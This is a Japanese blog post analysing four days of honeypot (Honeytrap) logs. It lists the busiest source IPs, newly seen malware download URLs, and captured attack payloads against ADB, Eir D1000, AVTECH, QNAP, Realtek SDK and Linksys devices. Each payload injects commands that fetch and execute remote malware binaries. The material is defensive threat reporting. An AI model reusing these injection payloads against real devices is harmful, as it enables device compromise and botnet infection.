【ハニーポット簡易分析】Honeytrap簡易分析(206-209日目:3/7-3/10)
今年も無事に扁桃腺にかかり、更新が遅れてしまいましたが、3/7(木)-3/10(日)までの簡易分析となります。
◾️Honeytrap簡易分析(206-209日目:3/7-3/10)
◾️検知数について
いくつかの日付で検知数が増加していますが「、連日来ているいつものIPでした。
<ペイロード>
...*%......Cookie: mstshash=Test..........
※ポート番号はランダム
| 送信元IP | 検知数 | 割合 |
| 62[.]76[.]75[.]210 | 160,757 | 42.32% |
| 195[.]19[.]10[.]135 | 118,945 | 31.32% |
| 195[.]19[.]10[.]195 | 80,277 | 21.14% |
◾️新規マルウェアダウンロード
| ポート | マルウェアダウンロード先 | VT |
| 8010 | hxxp://fid[.]hognoob[.]se/download[.]exe | |
| 8010 | hxxp://fffffff[.]ff/download[.]exe | |
| 8080 | hxxp://68[.]183[.]23[.]205/vb/Amakano[.]mpsl | |
| 8080 | hxxp://cnc[.]methaddict[.]xyz/bins/apep[.]mpsl | |
| 52869 | hxxp://157[.]230[.]168[.]17/bins/apep[.]mips |
新規のマルウェアダウンロードであるものの、攻撃手法は普段から利用されているものでした。
◾️マルウェアダウンロードを狙ったペイロード
| ポート 番号 |
ペイロード | 脆弱性 |
| 5555 | CNXN............2.......host::.OPEN........&....S......shell:cd /data/local/tmp/; busybox wget hxxp://185.61.138.13:8080/adb -O -> adb; sh adb; rm adb; wget hxxp://xxx.xxx.xxx.xxx:8080/adb2 -O -> adb2; sh adb2; rm adb2; busybox curl hxxp://xxx.xxx.xxx.xxx/:8080/adb3 > adb3; sh adb3; rm adb3; curl hxxp://xxx.xxx.xxx.xxx/:8080/adb4 > adb4; sh adb4; rm adb4. | Android Debug Bridge |
| 5555 | POST /UD/?5 hxxp/1.1.Host: xxx.xxx.xxx.xxx:5555..Connection: keep-alive..Accept-Encoding: gzip, deflate..Accept: */*..User-Agent: python-requests/2.12.4..SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers..Content-Length: 538......<?xml version="1.0"..<SOAP-ENV:Envelope xmlns:SOAP-ENV="hxxp://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/">.. <SOAP-ENV:Body>.. <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">.. <NewNTPServer1>`cd /tmp; /bin/busybox wget hxxp://xxx.xxx.xxx.xxx/d; sh d`</NewNTPServer1>.. <NewNTPServer2></NewNTPServer2>.. <NewNTPServer3></NewNTPServer3>.. <NewNTPServer4></NewNTPServer4>.. <NewNTPServer5></NewNTPServer5>.. </u:SetNTPServers>.. </SOAP-ENV:Body>..</SOAP-ENV:Envelope>.. | Eir D1000 routers |
| 8000 | GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20hxxp://xxx.xxx.xxx.xxx/kalon.arm5;chmod%20777%20kalon.arm5;sh%20kalon.arm5)&password=admin hxxp/1.1..User-Agent: Sefa.... | AVTECH |
| 8080 | GET /cgi-bin/authLogin.cgi hxxp/1.1.Host: 127.0.0.1.User-Agent: () { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c hxxp://xxx.xxx.xxx.xxx/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1 ... ... -t500 | QNAP Systems NAS |
| 8443 | GET /cgi-bin/;cd$%7BIFS%7D/var/tmp;$%7BIFS%7Dwget$%7BIFS%7Dhxxp://xxx.xxx.xxx.xxx/x/Meraki.mips;$%7BIFS%7Dchmod$%7BIFS%7D777$%7BIFS%7D/x/Meraki.mips;$%7BIFS%7D.//x/Meraki.mips;$%7BIFS%7Drm$%7BIFS%7D-rf$%7BIFS%7D/x/Meraki.mips hxxp/1.1..Host: xxx.xxx.xxx.xxx:8443..Connection: keep-alive..Accept-Encoding: gzip, deflate..Accept: */*..User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.11.1.el6.x86_64.... | ? |
| 52869 | POST /picsdesc.xml hxxp/1.1..Content-Length: 630..Accept-Encoding: gzip, deflate..SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping..Accept: */*..User-Agent: Hello-World..Connection: keep-alive....<?xml version="1.0" ?><s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/; rm -rf *; cd /tmp/; wget hxxp://xxx.xxx.xxx.xxx/bins/Freya.mips -O Freya.mips; cd /tmp/; chmod 777 Freya.mips; ./Freya.mips Freya.Realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>.... | Realtek SDK |
| 55555 | POST /tmUnblock.cgi hxxp/1.1..Host: xxx.xxx.xxx.xxx:55555..Content-Length: 278..Accept-Encoding: gzip, deflate..Accept: */*..User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.el6.x86_64..Connection: keep-alive..Content-Type: application/x-www-form-urlencoded....ttcp_ip=-h+%60cd+%2Ftmp%3B+wget+hxxp://xxx.xxx.xxx.xxx%2FCorona.mipsel%3Btftp+-r+Corona.mipsel+-g+xxx.xxx.xxx.xxx3B+chmod+777+Corona.mipsel%3B.%2FCorona.mipsel%3Brm+-rf+Corona.mipsel+mipsel%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1 | Linksys ルータ |
以上となります。
